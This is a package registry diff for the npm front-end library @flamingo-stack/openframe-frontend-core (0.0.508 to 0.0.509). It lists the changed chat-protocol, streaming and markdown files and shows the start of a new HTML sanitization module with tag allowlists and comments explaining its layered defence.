@flamingo-stack/openframe-frontend-core 0.0.508 → 0.0.509

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (306) hide show
  1. package/dist/chat-protocol/decode.d.ts +58 -0
  2. package/dist/chat-protocol/decode.d.ts.map +1 -0
  3. package/dist/chat-protocol/encode.d.ts +44 -0
  4. package/dist/chat-protocol/encode.d.ts.map +1 -0
  5. package/dist/chat-protocol/env-flag.d.ts +35 -0
  6. package/dist/chat-protocol/env-flag.d.ts.map +1 -0
  7. package/dist/chat-protocol/events.d.ts +216 -0
  8. package/dist/chat-protocol/events.d.ts.map +1 -0
  9. package/dist/chat-protocol/frames.d.ts +213 -0
  10. package/dist/chat-protocol/frames.d.ts.map +1 -0
  11. package/dist/chat-protocol/index.cjs +506 -0
  12. package/dist/chat-protocol/index.cjs.map +1 -0
  13. package/dist/chat-protocol/index.d.ts +18 -0
  14. package/dist/chat-protocol/index.d.ts.map +1 -0
  15. package/dist/chat-protocol/index.js +490 -0
  16. package/dist/chat-protocol/index.js.map +1 -0
  17. package/dist/chat-protocol/ip-normalize.d.ts +44 -0
  18. package/dist/chat-protocol/ip-normalize.d.ts.map +1 -0
  19. package/dist/chat-protocol/nats-decoder.d.ts +26 -0
  20. package/dist/chat-protocol/nats-decoder.d.ts.map +1 -0
  21. package/dist/{chunk-3SQ5KXHQ.cjs → chunk-2T4GTV25.cjs} +9 -9
  22. package/dist/{chunk-3SQ5KXHQ.cjs.map → chunk-2T4GTV25.cjs.map} +1 -1
  23. package/dist/{chunk-CWAOV2FK.cjs → chunk-3CGZPAGR.cjs} +3 -3
  24. package/dist/{chunk-CWAOV2FK.cjs.map → chunk-3CGZPAGR.cjs.map} +1 -1
  25. package/dist/{chunk-TLMJHMXJ.js → chunk-3QSR22IC.js} +12 -12
  26. package/dist/chunk-3QSR22IC.js.map +1 -0
  27. package/dist/{chunk-TWYNR4TZ.cjs → chunk-4G5TLHJD.cjs} +7141 -4799
  28. package/dist/chunk-4G5TLHJD.cjs.map +1 -0
  29. package/dist/{chunk-ADPMHWOE.js → chunk-72XAID7Y.js} +4 -4
  30. package/dist/{chunk-PAGKRNWK.js → chunk-7WZHBQ4J.js} +2 -2
  31. package/dist/{chunk-OCEKO5CW.js → chunk-AEELJC4N.js} +12106 -9764
  32. package/dist/chunk-AEELJC4N.js.map +1 -0
  33. package/dist/{chunk-Z42BGM6Q.cjs → chunk-BT2WWDFP.cjs} +5 -5
  34. package/dist/{chunk-Z42BGM6Q.cjs.map → chunk-BT2WWDFP.cjs.map} +1 -1
  35. package/dist/{chunk-7LEL3RIX.cjs → chunk-C7OY3PQP.cjs} +11 -11
  36. package/dist/{chunk-7LEL3RIX.cjs.map → chunk-C7OY3PQP.cjs.map} +1 -1
  37. package/dist/{chunk-RHGGEKPQ.cjs → chunk-CIOLOQKQ.cjs} +4 -4
  38. package/dist/{chunk-RHGGEKPQ.cjs.map → chunk-CIOLOQKQ.cjs.map} +1 -1
  39. package/dist/{chunk-TSZHM74B.js → chunk-DC2TKS7C.js} +2 -2
  40. package/dist/{chunk-M2GOR3XQ.cjs → chunk-DYPYR7FR.cjs} +87 -87
  41. package/dist/{chunk-M2GOR3XQ.cjs.map → chunk-DYPYR7FR.cjs.map} +1 -1
  42. package/dist/{chunk-I64ABCDX.js → chunk-I2B6X77L.js} +2 -2
  43. package/dist/{chunk-NIZDKTGL.cjs → chunk-K5MSCMDK.cjs} +37 -37
  44. package/dist/{chunk-NIZDKTGL.cjs.map → chunk-K5MSCMDK.cjs.map} +1 -1
  45. package/dist/{chunk-DTYRYB2N.js → chunk-K6QTZ7CZ.js} +2 -2
  46. package/dist/{chunk-4LTMXDUS.js → chunk-KBN7PMFT.js} +2 -2
  47. package/dist/{chunk-TBMV7I5N.js → chunk-KXZO2WZX.js} +2 -2
  48. package/dist/{chunk-QTYZMP6D.cjs → chunk-LBAKLT6T.cjs} +62 -62
  49. package/dist/chunk-LBAKLT6T.cjs.map +1 -0
  50. package/dist/{chunk-KEBYLU3U.js → chunk-LFUPI7VX.js} +2 -2
  51. package/dist/{chunk-LDTR4IVZ.cjs → chunk-M37PBG4N.cjs} +31 -31
  52. package/dist/{chunk-LDTR4IVZ.cjs.map → chunk-M37PBG4N.cjs.map} +1 -1
  53. package/dist/{chunk-WA7RR64F.js → chunk-PO5O654H.js} +6 -5
  54. package/dist/chunk-PO5O654H.js.map +1 -0
  55. package/dist/{chunk-WK4N5VBX.cjs → chunk-QJJISLPA.cjs} +28 -27
  56. package/dist/chunk-QJJISLPA.cjs.map +1 -0
  57. package/dist/{chunk-2F44PLTV.cjs → chunk-T7MCSA55.cjs} +26 -26
  58. package/dist/{chunk-2F44PLTV.cjs.map → chunk-T7MCSA55.cjs.map} +1 -1
  59. package/dist/{chunk-WJQHJD7J.js → chunk-TWSKTJHW.js} +2 -2
  60. package/dist/{chunk-ZSQHZYCO.cjs → chunk-UQDMJ6DH.cjs} +13 -13
  61. package/dist/{chunk-ZSQHZYCO.cjs.map → chunk-UQDMJ6DH.cjs.map} +1 -1
  62. package/dist/{chunk-TZRUCD56.js → chunk-V3ZAAFE3.js} +5 -5
  63. package/dist/{chunk-LRGHJPET.js → chunk-XGIFOHKE.js} +2 -2
  64. package/dist/{chunk-POOMO3PA.cjs → chunk-YQEPRYT5.cjs} +7 -7
  65. package/dist/{chunk-POOMO3PA.cjs.map → chunk-YQEPRYT5.cjs.map} +1 -1
  66. package/dist/components/case-studies/index.cjs +8 -8
  67. package/dist/components/case-studies/index.js +2 -2
  68. package/dist/components/chat/chat-message-enhanced.d.ts.map +1 -1
  69. package/dist/components/chat/chat-message-list.d.ts.map +1 -1
  70. package/dist/components/chat/hooks/index.d.ts +0 -1
  71. package/dist/components/chat/hooks/index.d.ts.map +1 -1
  72. package/dist/components/chat/hooks/use-chat.d.ts.map +1 -1
  73. package/dist/components/chat/hooks/use-chunk-catchup.d.ts.map +1 -1
  74. package/dist/components/chat/hooks/use-nats-chat-adapter.d.ts +15 -48
  75. package/dist/components/chat/hooks/use-nats-chat-adapter.d.ts.map +1 -1
  76. package/dist/components/chat/hooks/use-sse-chat-adapter.d.ts +10 -57
  77. package/dist/components/chat/hooks/use-sse-chat-adapter.d.ts.map +1 -1
  78. package/dist/components/chat/index.cjs +10 -2
  79. package/dist/components/chat/index.cjs.map +1 -1
  80. package/dist/components/chat/index.d.ts +1 -0
  81. package/dist/components/chat/index.d.ts.map +1 -1
  82. package/dist/components/chat/index.js +21 -13
  83. package/dist/components/chat/stream/chat-dialog-store.d.ts +184 -0
  84. package/dist/components/chat/stream/chat-dialog-store.d.ts.map +1 -0
  85. package/dist/components/chat/stream/chat-stream-reducer.d.ts +380 -0
  86. package/dist/components/chat/stream/chat-stream-reducer.d.ts.map +1 -0
  87. package/dist/components/chat/stream/delta-batcher.d.ts +51 -0
  88. package/dist/components/chat/stream/delta-batcher.d.ts.map +1 -0
  89. package/dist/components/chat/stream/index.d.ts +17 -0
  90. package/dist/components/chat/stream/index.d.ts.map +1 -0
  91. package/dist/components/chat/stream/message-mutations.d.ts +77 -0
  92. package/dist/components/chat/stream/message-mutations.d.ts.map +1 -0
  93. package/dist/components/chat/stream/use-chat-stream-reducer.d.ts +22 -0
  94. package/dist/components/chat/stream/use-chat-stream-reducer.d.ts.map +1 -0
  95. package/dist/components/chat/types/api.types.d.ts +1 -81
  96. package/dist/components/chat/types/api.types.d.ts.map +1 -1
  97. package/dist/components/chat/types/processing.types.d.ts +2 -93
  98. package/dist/components/chat/types/processing.types.d.ts.map +1 -1
  99. package/dist/components/chat/types/unified-chat-state.types.d.ts +15 -0
  100. package/dist/components/chat/types/unified-chat-state.types.d.ts.map +1 -1
  101. package/dist/components/chat/utils/extract-incomplete-message-state.d.ts +34 -6
  102. package/dist/components/chat/utils/extract-incomplete-message-state.d.ts.map +1 -1
  103. package/dist/components/chat/utils/history-merge.d.ts.map +1 -1
  104. package/dist/components/chat/utils/index.d.ts +2 -3
  105. package/dist/components/chat/utils/index.d.ts.map +1 -1
  106. package/dist/components/chat/utils/process-historical-messages.d.ts +59 -11
  107. package/dist/components/chat/utils/process-historical-messages.d.ts.map +1 -1
  108. package/dist/components/contact/index.cjs +3 -3
  109. package/dist/components/contact/index.js +2 -2
  110. package/dist/components/docs/index.cjs +5 -5
  111. package/dist/components/docs/index.js +4 -4
  112. package/dist/components/embeds/index.cjs +3 -3
  113. package/dist/components/embeds/index.js +2 -2
  114. package/dist/components/faq/index.cjs +3 -3
  115. package/dist/components/faq/index.js +2 -2
  116. package/dist/components/features/index.cjs +2 -2
  117. package/dist/components/features/index.js +1 -1
  118. package/dist/components/help-center-pages/index.cjs +22 -22
  119. package/dist/components/help-center-pages/index.js +13 -13
  120. package/dist/components/index.cjs +174 -132
  121. package/dist/components/index.cjs.map +1 -1
  122. package/dist/components/index.js +65 -23
  123. package/dist/components/index.js.map +1 -1
  124. package/dist/components/meeting-scheduler/index.cjs +34 -34
  125. package/dist/components/meeting-scheduler/index.js +3 -3
  126. package/dist/components/navigation/index.cjs +2 -2
  127. package/dist/components/navigation/index.js +1 -1
  128. package/dist/components/onboarding-guides/index.cjs +5 -5
  129. package/dist/components/onboarding-guides/index.js +4 -4
  130. package/dist/components/onboarding-guides/onboarding-guide-detail-view.d.ts.map +1 -1
  131. package/dist/components/related-content/index.cjs +3 -3
  132. package/dist/components/related-content/index.js +2 -2
  133. package/dist/components/shared/product-release/release-detail-page.d.ts.map +1 -1
  134. package/dist/components/tickets/index.cjs +6 -6
  135. package/dist/components/tickets/index.js +5 -5
  136. package/dist/components/ui/index.cjs +44 -2
  137. package/dist/components/ui/index.cjs.map +1 -1
  138. package/dist/components/ui/index.d.ts +1 -2
  139. package/dist/components/ui/index.d.ts.map +1 -1
  140. package/dist/components/ui/index.js +55 -13
  141. package/dist/components/ui/markdown/base-components.d.ts +51 -0
  142. package/dist/components/ui/markdown/base-components.d.ts.map +1 -0
  143. package/dist/components/ui/markdown/engine.d.ts +99 -0
  144. package/dist/components/ui/markdown/engine.d.ts.map +1 -0
  145. package/dist/components/ui/markdown/heading-ids.d.ts +65 -0
  146. package/dist/components/ui/markdown/heading-ids.d.ts.map +1 -0
  147. package/dist/components/ui/markdown/index.d.ts +18 -0
  148. package/dist/components/ui/markdown/index.d.ts.map +1 -0
  149. package/dist/components/ui/markdown/mermaid-diagram.d.ts +79 -0
  150. package/dist/components/ui/markdown/mermaid-diagram.d.ts.map +1 -0
  151. package/dist/components/ui/markdown/rich/embed-overrides.d.ts +14 -0
  152. package/dist/components/ui/markdown/rich/embed-overrides.d.ts.map +1 -0
  153. package/dist/components/ui/markdown/rich/rich-markdown-renderer.d.ts +40 -0
  154. package/dist/components/ui/markdown/rich/rich-markdown-renderer.d.ts.map +1 -0
  155. package/dist/components/ui/markdown/rich/shortcodes.d.ts +8 -0
  156. package/dist/components/ui/markdown/rich/shortcodes.d.ts.map +1 -0
  157. package/dist/components/ui/markdown/sanitize.d.ts +153 -0
  158. package/dist/components/ui/markdown/sanitize.d.ts.map +1 -0
  159. package/dist/components/ui/markdown/simple-markdown-renderer.d.ts +23 -0
  160. package/dist/components/ui/markdown/simple-markdown-renderer.d.ts.map +1 -0
  161. package/dist/components/ui/markdown/streaming.d.ts +78 -0
  162. package/dist/components/ui/markdown/streaming.d.ts.map +1 -0
  163. package/dist/components/ui/markdown/text-size.d.ts +34 -0
  164. package/dist/components/ui/markdown/text-size.d.ts.map +1 -0
  165. package/dist/index.cjs +60 -2
  166. package/dist/index.cjs.map +1 -1
  167. package/dist/index.js +71 -13
  168. package/dist/utils/index.cjs +169 -40
  169. package/dist/utils/index.cjs.map +1 -1
  170. package/dist/utils/index.d.ts +1 -0
  171. package/dist/utils/index.d.ts.map +1 -1
  172. package/dist/utils/index.js +162 -41
  173. package/dist/utils/index.js.map +1 -1
  174. package/dist/utils/markdown-fences.d.ts +42 -0
  175. package/dist/utils/markdown-fences.d.ts.map +1 -0
  176. package/dist/utils/markdown-heading-id.d.ts +85 -0
  177. package/dist/utils/markdown-heading-id.d.ts.map +1 -0
  178. package/dist/utils/markdown-section-extractor.d.ts.map +1 -1
  179. package/package.json +7 -1
  180. package/src/chat-protocol/__tests__/__snapshots__/nats-decoder-golden.test.ts.snap +319 -0
  181. package/src/chat-protocol/__tests__/chat-protocol.test.ts +516 -0
  182. package/src/chat-protocol/__tests__/env-flag.test.ts +52 -0
  183. package/src/chat-protocol/__tests__/ip-normalize.test.ts +136 -0
  184. package/src/chat-protocol/__tests__/nats-decoder-golden.test.ts +237 -0
  185. package/src/chat-protocol/decode.ts +278 -0
  186. package/src/chat-protocol/encode.ts +71 -0
  187. package/src/chat-protocol/env-flag.ts +39 -0
  188. package/src/chat-protocol/events.ts +254 -0
  189. package/src/chat-protocol/frames.ts +245 -0
  190. package/src/chat-protocol/index.ts +21 -0
  191. package/src/chat-protocol/ip-normalize.ts +146 -0
  192. package/src/chat-protocol/nats-decoder.ts +264 -0
  193. package/src/components/chat/.chat-message-list.md +10 -6
  194. package/src/components/chat/__tests__/chat-message-list.test.tsx +450 -9
  195. package/src/components/chat/__tests__/chat-message-streaming-memo.test.tsx +207 -0
  196. package/src/components/chat/__tests__/chat-pending-turn.test.tsx +250 -0
  197. package/src/components/chat/chat-message-enhanced.tsx +122 -20
  198. package/src/components/chat/chat-message-list.tsx +515 -133
  199. package/src/components/chat/embeddable-chat.tsx +6 -0
  200. package/src/components/chat/hooks/.index.md +30 -33
  201. package/src/components/chat/hooks/.use-nats-chat-adapter.md +36 -55
  202. package/src/components/chat/hooks/__tests__/__snapshots__/conversation-id-persistence-golden.test.ts.snap +37 -0
  203. package/src/components/chat/hooks/__tests__/__snapshots__/sse-stream-golden.test.ts.snap +0 -0
  204. package/src/components/chat/hooks/__tests__/chunk-catchup-dialog-staleness.test.ts +92 -0
  205. package/src/components/chat/hooks/__tests__/conversation-id-persistence-golden.test.ts +438 -0
  206. package/src/components/chat/hooks/__tests__/sse-stream-golden.test.ts +318 -0
  207. package/src/components/chat/hooks/index.ts +0 -1
  208. package/src/components/chat/hooks/use-chat.ts +8 -0
  209. package/src/components/chat/hooks/use-chunk-catchup.ts +26 -1
  210. package/src/components/chat/hooks/use-nats-chat-adapter.ts +254 -825
  211. package/src/components/chat/hooks/use-sse-chat-adapter.ts +380 -684
  212. package/src/components/chat/index.ts +5 -0
  213. package/src/components/chat/stream/__tests__/__snapshots__/chat-stream-reducer-golden.test.ts.snap +944 -0
  214. package/src/components/chat/stream/__tests__/chat-dialog-store.test.ts +806 -0
  215. package/src/components/chat/stream/__tests__/chat-stream-reducer-golden.test.ts +467 -0
  216. package/src/components/chat/stream/__tests__/chat-stream-reducer.test.ts +1330 -0
  217. package/src/components/chat/stream/__tests__/delta-batcher.test.ts +255 -0
  218. package/src/components/chat/stream/__tests__/use-chat-stream-reducer.test.ts +105 -0
  219. package/src/components/chat/stream/chat-dialog-store.ts +536 -0
  220. package/src/components/chat/stream/chat-stream-reducer.ts +1928 -0
  221. package/src/components/chat/stream/delta-batcher.ts +168 -0
  222. package/src/components/chat/stream/index.ts +55 -0
  223. package/src/components/chat/stream/message-mutations.ts +340 -0
  224. package/src/components/chat/stream/use-chat-stream-reducer.ts +126 -0
  225. package/src/components/chat/thinking-display.tsx +1 -1
  226. package/src/components/chat/types/.api.types.md +39 -49
  227. package/src/components/chat/types/.processing.types.md +29 -58
  228. package/src/components/chat/types/.unified-chat-state.types.md +2 -2
  229. package/src/components/chat/types/api.types.ts +6 -73
  230. package/src/components/chat/types/processing.types.ts +11 -53
  231. package/src/components/chat/types/unified-chat-state.types.ts +16 -0
  232. package/src/components/chat/utils/.extract-incomplete-message-state.md +21 -3
  233. package/src/components/chat/utils/.history-merge.md +44 -3
  234. package/src/components/chat/utils/.index.md +31 -40
  235. package/src/components/chat/utils/__tests__/__snapshots__/process-historical-messages-golden.test.ts.snap +420 -0
  236. package/src/components/chat/utils/__tests__/__snapshots__/segment-accumulator-golden.test.ts.snap +605 -0
  237. package/src/components/chat/utils/__tests__/extract-incomplete-message-state.test.ts +106 -0
  238. package/src/components/chat/utils/__tests__/history-merge.test.ts +160 -0
  239. package/src/components/chat/utils/__tests__/process-historical-messages-approvals.test.ts +61 -0
  240. package/src/components/chat/utils/__tests__/process-historical-messages-golden.test.ts +394 -0
  241. package/src/components/chat/utils/__tests__/segment-accumulator-golden.test.ts +270 -0
  242. package/src/components/chat/utils/extract-incomplete-message-state.ts +93 -6
  243. package/src/components/chat/utils/history-merge.ts +85 -5
  244. package/src/components/chat/utils/index.ts +5 -8
  245. package/src/components/chat/utils/process-historical-messages.ts +361 -385
  246. package/src/components/onboarding-guides/onboarding-guide-detail-view.tsx +22 -4
  247. package/src/components/shared/legal-document/legal-document-page.tsx +1 -1
  248. package/src/components/shared/product-release/release-detail-page.tsx +19 -4
  249. package/src/components/ui/__tests__/__snapshots__/markdown-parity.test.tsx.snap +2420 -0
  250. package/src/components/ui/__tests__/markdown-parity.test.tsx +2540 -0
  251. package/src/components/ui/index.ts +1 -2
  252. package/src/components/ui/markdown/__tests__/mermaid-security.test.ts +176 -0
  253. package/src/components/ui/markdown/__tests__/mermaid-stale-render.test.tsx +151 -0
  254. package/src/components/ui/markdown/__tests__/sanitize-invariant.test.ts +354 -0
  255. package/src/components/ui/markdown/__tests__/sanitize-render.test.tsx +118 -0
  256. package/src/components/ui/markdown/__tests__/streaming.test.tsx +436 -0
  257. package/src/components/ui/markdown/base-components.tsx +360 -0
  258. package/src/components/ui/markdown/engine.tsx +315 -0
  259. package/src/components/ui/markdown/heading-ids.ts +239 -0
  260. package/src/components/ui/markdown/index.ts +49 -0
  261. package/src/components/ui/markdown/mermaid-diagram.tsx +323 -0
  262. package/src/components/ui/markdown/rich/embed-overrides.tsx +199 -0
  263. package/src/components/ui/markdown/rich/rich-markdown-renderer.tsx +184 -0
  264. package/src/components/ui/markdown/rich/shortcodes.ts +170 -0
  265. package/src/components/ui/markdown/sanitize.ts +3584 -0
  266. package/src/components/ui/markdown/simple-markdown-renderer.tsx +28 -0
  267. package/src/components/ui/markdown/streaming.ts +390 -0
  268. package/src/components/ui/markdown/text-size.ts +106 -0
  269. package/src/components/ui/release-changelog-section.tsx +1 -1
  270. package/src/components/ui/ticket-info-section.tsx +1 -1
  271. package/src/utils/index.ts +1 -0
  272. package/src/utils/markdown-fences.ts +127 -0
  273. package/src/utils/markdown-heading-id.ts +348 -0
  274. package/src/utils/markdown-section-extractor.ts +41 -56
  275. package/dist/chunk-OCEKO5CW.js.map +0 -1
  276. package/dist/chunk-QTYZMP6D.cjs.map +0 -1
  277. package/dist/chunk-TLMJHMXJ.js.map +0 -1
  278. package/dist/chunk-TWYNR4TZ.cjs.map +0 -1
  279. package/dist/chunk-WA7RR64F.js.map +0 -1
  280. package/dist/chunk-WK4N5VBX.cjs.map +0 -1
  281. package/dist/components/chat/hooks/use-realtime-chunk-processor.d.ts +0 -6
  282. package/dist/components/chat/hooks/use-realtime-chunk-processor.d.ts.map +0 -1
  283. package/dist/components/chat/utils/chunk-parser.d.ts +0 -25
  284. package/dist/components/chat/utils/chunk-parser.d.ts.map +0 -1
  285. package/dist/components/ui/rich-markdown-renderer.d.ts +0 -34
  286. package/dist/components/ui/rich-markdown-renderer.d.ts.map +0 -1
  287. package/dist/components/ui/simple-markdown-renderer.d.ts +0 -73
  288. package/dist/components/ui/simple-markdown-renderer.d.ts.map +0 -1
  289. package/src/components/chat/hooks/.use-realtime-chunk-processor.md +0 -77
  290. package/src/components/chat/hooks/use-realtime-chunk-processor.ts +0 -489
  291. package/src/components/chat/utils/.chunk-parser.md +0 -62
  292. package/src/components/chat/utils/chunk-parser.ts +0 -262
  293. package/src/components/ui/.simple-markdown-renderer.md +0 -52
  294. package/src/components/ui/rich-markdown-renderer.tsx +0 -1223
  295. package/src/components/ui/simple-markdown-renderer.tsx +0 -964
  296. /package/dist/{chunk-ADPMHWOE.js.map → chunk-72XAID7Y.js.map} +0 -0
  297. /package/dist/{chunk-PAGKRNWK.js.map → chunk-7WZHBQ4J.js.map} +0 -0
  298. /package/dist/{chunk-TSZHM74B.js.map → chunk-DC2TKS7C.js.map} +0 -0
  299. /package/dist/{chunk-I64ABCDX.js.map → chunk-I2B6X77L.js.map} +0 -0
  300. /package/dist/{chunk-DTYRYB2N.js.map → chunk-K6QTZ7CZ.js.map} +0 -0
  301. /package/dist/{chunk-4LTMXDUS.js.map → chunk-KBN7PMFT.js.map} +0 -0
  302. /package/dist/{chunk-TBMV7I5N.js.map → chunk-KXZO2WZX.js.map} +0 -0
  303. /package/dist/{chunk-KEBYLU3U.js.map → chunk-LFUPI7VX.js.map} +0 -0
  304. /package/dist/{chunk-WJQHJD7J.js.map → chunk-TWSKTJHW.js.map} +0 -0
  305. /package/dist/{chunk-TZRUCD56.js.map → chunk-V3ZAAFE3.js.map} +0 -0
  306. /package/dist/{chunk-LRGHJPET.js.map → chunk-XGIFOHKE.js.map} +0 -0
@@ -0,0 +1,3584 @@
1
+ /**
2
+ * Sanitization SSOT for the unified markdown engine.
3
+ *
4
+ * Layered defense (order matters, see engine.tsx):
5
+ * 1. `escapeUnknownHtmlTags` — TEXT pre-pass. Escapes `<tag>`s outside the
6
+ * effective allowlist so LLM-emitted pseudo-tags (`<their>`, `<ticket>`)
7
+ * never reach React as unknown elements (React 19 crash guard).
8
+ * NOT a security boundary.
9
+ * 2. `rehype-raw` parses remaining raw HTML into HAST.
10
+ * 3. `rehypeSanitize` with `buildSanitizeSchema(...)` — the audited
11
+ * allow-list boundary (hast-util-sanitize) with a schema extended to
12
+ * exactly what our surfaces need.
13
+ * 4. `rehypeStripUnsafe` — custom strip pass kept as defense-in-depth
14
+ * (srcset candidate scanning, iframe[srcdoc], belt-and-suspenders if
15
+ * the schema is ever loosened).
16
+ *
17
+ * COUPLED-ALLOWLIST INVARIANT (tested in __tests__/sanitize-invariant.test.ts):
18
+ * the two effective tag lists are EQUAL (case-insensitively), both computed
19
+ * AFTER merging `extraAllowedHtmlTags`. Both directions matter:
20
+ * - pre-pass ⊆ sanitizer: the pre-pass must never admit a raw tag the
21
+ * sanitizer then silently drops.
22
+ * - sanitizer ⊆ pre-pass: the pre-pass must never ESCAPE a tag the
23
+ * sanitizer would happily keep. This direction was broken before
24
+ * 2026-07: `strike` (and every other `defaultSchema`-only tag) survived
25
+ * the sanitizer but was escaped to `&lt;strike&gt;` source text by the
26
+ * pre-pass, so legacy authored markup regressed to visible tag soup.
27
+ * Both lists are now derived from the SINGLE `effectiveTagList()` below —
28
+ * never fork them.
29
+ *
30
+ * ONE documented exception, and it is CONTENT-dependent rather than
31
+ * list-level (so the invariant test still holds as an equality of tag SETS):
32
+ * an UNCLOSED RAWTEXT/RCDATA opener (`<textarea>`, `<iframe>`, `<title>`, …)
33
+ * is escaped by the pre-pass even though the sanitizer allowlists it —
34
+ * because parse5's tokenizer would otherwise swallow the remainder of the
35
+ * document into it before the sanitizer ever runs. See RAWTEXT_TAGS below.
36
+ */
37
+ import { defaultSchema } from 'rehype-sanitize'
38
+ import { visit } from 'unist-util-visit'
39
+ import { defaultUrlTransform } from 'react-markdown'
40
+ import { createFenceTracker, isBlankLine } from '../../../utils/markdown-fences'
41
+
42
+ // ---------------------------------------------------------------------------
43
+ // Shared tag allowlist (pre-pass baseline)
44
+ // ---------------------------------------------------------------------------
45
+ /**
46
+ * Tags the TEXT pre-pass forwards as raw HTML. Anything outside this set
47
+ * (plus per-composition `extraAllowedHtmlTags`) gets its angle brackets
48
+ * escaped and renders as plain text.
49
+ *
50
+ * `video` is deliberately NOT in the baseline: chat strips <video>
51
+ * server-side and playback goes through the <Video> SSOT. The rich
52
+ * composition opts back in via `extraAllowedHtmlTags={['video', 'source']}`
53
+ * so authored content (blog publisher video injection) keeps working.
54
+ */
55
+ export const SAFE_HTML_TAGS = new Set([
56
+ // Block + inline text
57
+ 'a', 'abbr', 'address', 'article', 'aside', 'b', 'bdi', 'bdo', 'blockquote',
58
+ 'br', 'caption', 'cite', 'code', 'col', 'colgroup', 'data', 'dd', 'del',
59
+ 'details', 'dfn', 'div', 'dl', 'dt', 'em', 'figcaption', 'figure', 'footer',
60
+ 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'header', 'hgroup', 'hr', 'i', 'ins',
61
+ 'kbd', 'li', 'main', 'mark', 'nav', 'ol', 'p', 'pre', 'q', 'rp', 'rt',
62
+ 'ruby', 's', 'samp', 'section', 'small', 'span', 'strong', 'sub', 'summary',
63
+ 'sup', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead', 'time', 'tr', 'u',
64
+ 'ul', 'var', 'wbr',
65
+ // Deprecated presentational tags that REAL authored content still carries.
66
+ // They rendered before the unification (neither old renderer had a
67
+ // pre-pass), so escaping them to visible `&lt;center&gt;` source text was a
68
+ // regression. `font` gets its legacy attributes below so the sanitizer
69
+ // doesn't reduce it to a bare no-op tag. (`marquee` stays out — it is
70
+ // animated chrome, not text markup, and no audit hit found it.)
71
+ 'center', 'font', 'big',
72
+ // Media ('video' intentionally excluded — see the header comment)
73
+ 'img', 'picture', 'source', 'audio', 'iframe', 'track',
74
+ // Forms (rehype-raw allows them; mostly harmless for chat output)
75
+ 'button', 'input', 'label', 'select', 'option', 'optgroup', 'textarea', 'form', 'fieldset', 'legend',
76
+ ])
77
+
78
+ /**
79
+ * Inline SVG element set, in the CANONICAL case parse5 produces for SVG
80
+ * foreign content (`linearGradient`, `clipPath`, … are camelCase in the
81
+ * HTML parser's SVG adjustment table, so the sanitize schema must match
82
+ * that spelling; the text pre-pass lowercases before lookup).
83
+ *
84
+ * Inline `<svg>` renders in real published posts (hand-authored diagrams
85
+ * and inline icon markup — NOT `<use href>` sprite references, which are
86
+ * deliberately dropped; see SVG_ATTRIBUTES). The Rich renderer had NO pre-pass
87
+ * and NO sanitizer, so it always rendered; without this set the unified
88
+ * engine would escape it to visible source text.
89
+ *
90
+ * SEVERAL OF THESE NAMES ARE ALSO HTML ELEMENTS (`title`, `desc`, `text`,
91
+ * `g`, `line`, `use`, `symbol`, `marker`, `mask`, `pattern`) — admitting
92
+ * them UNCONSTRAINED let a post or a chat message emit a bare `<title>`,
93
+ * which React 19 hoists into `<head>` (browser-tab + SEO title hijack) and
94
+ * whose RAWTEXT content model swallows the rest of the document when
95
+ * unclosed. They are therefore pinned to an `svg` ancestor in
96
+ * `SVG_ONLY_ANCESTORS` below; outside `<svg>` the sanitizer drops them.
97
+ */
98
+ export const SVG_TAGS = new Set([
99
+ 'svg', 'path', 'circle', 'ellipse', 'g', 'rect', 'line', 'polyline',
100
+ 'polygon', 'text', 'tspan', 'defs', 'use', 'symbol', 'title', 'desc',
101
+ 'marker', 'mask', 'pattern', 'linearGradient', 'radialGradient', 'stop',
102
+ 'clipPath',
103
+ ])
104
+
105
+ /**
106
+ * Required-ancestor constraints for the SVG-only tags (hast-util-sanitize
107
+ * `ancestors`: a listed tag survives ONLY inside one of its ancestors).
108
+ *
109
+ * The TEXT pre-pass may still forward these — it is a flat regex over source
110
+ * text, cannot see nesting, and is explicitly NOT a security boundary. The
111
+ * coupled-allowlist invariant still holds because `ancestors` RESTRICTS a
112
+ * tag the schema already lists; it never adds one the pre-pass would escape.
113
+ */
114
+ const SVG_ONLY_ANCESTORS: Record<string, string[]> = {
115
+ title: ['svg'],
116
+ desc: ['svg'],
117
+ text: ['svg'],
118
+ tspan: ['svg', 'text'],
119
+ use: ['svg'],
120
+ symbol: ['svg'],
121
+ marker: ['svg'],
122
+ mask: ['svg'],
123
+ pattern: ['svg'],
124
+ g: ['svg'],
125
+ line: ['svg'],
126
+ path: ['svg'],
127
+ circle: ['svg'],
128
+ ellipse: ['svg'],
129
+ rect: ['svg'],
130
+ polyline: ['svg'],
131
+ polygon: ['svg'],
132
+ defs: ['svg'],
133
+ stop: ['svg'],
134
+ linearGradient: ['svg'],
135
+ radialGradient: ['svg'],
136
+ clipPath: ['svg'],
137
+ }
138
+
139
+ /**
140
+ * THE effective tag list for a composition, canonical case — the single
141
+ * source both the pre-pass set and the sanitize schema derive from
142
+ * (coupled-allowlist invariant, both directions).
143
+ *
144
+ * `defaultSchema.tagNames` is unioned in so the pre-pass can never escape a
145
+ * tag hast-util-sanitize would keep (`strike`, `tt`, …).
146
+ */
147
+ function effectiveTagList(extraAllowedHtmlTags?: string[]): string[] {
148
+ return [
149
+ ...(defaultSchema.tagNames ?? []),
150
+ ...SAFE_HTML_TAGS,
151
+ ...SVG_TAGS,
152
+ ...(extraAllowedHtmlTags ?? []),
153
+ ]
154
+ }
155
+
156
+ /** Effective pre-pass tag set for a composition (lowercased for lookup). */
157
+ export function buildEffectiveTagSet(extraAllowedHtmlTags?: string[]): Set<string> {
158
+ return new Set(effectiveTagList(extraAllowedHtmlTags).map((t) => t.toLowerCase()))
159
+ }
160
+
161
+ // ---------------------------------------------------------------------------
162
+ // rehype-sanitize schema (allow-list boundary)
163
+ // ---------------------------------------------------------------------------
164
+ /**
165
+ * Per-tag attribute allowances layered on top of hast-util-sanitize's
166
+ * defaultSchema. Property names are hast camelCase. Attribute survival
167
+ * matters as much as tag survival — an attribute-stripped `<video>` is a
168
+ * sourceless player (see plan: "video-survives-sanitize fixture").
169
+ */
170
+ const EXTRA_ATTRIBUTES: Record<string, Array<string | [string, ...unknown[]]>> = {
171
+ // `style` is allowed on the tags the 2026-07 content-store audit found it
172
+ // on in REAL published posts (div.takeaway, table styling, reddit
173
+ // blockquotes). This matches pre-unification behavior on BOTH surfaces —
174
+ // neither old renderer stripped style — so it is parity, not loosening;
175
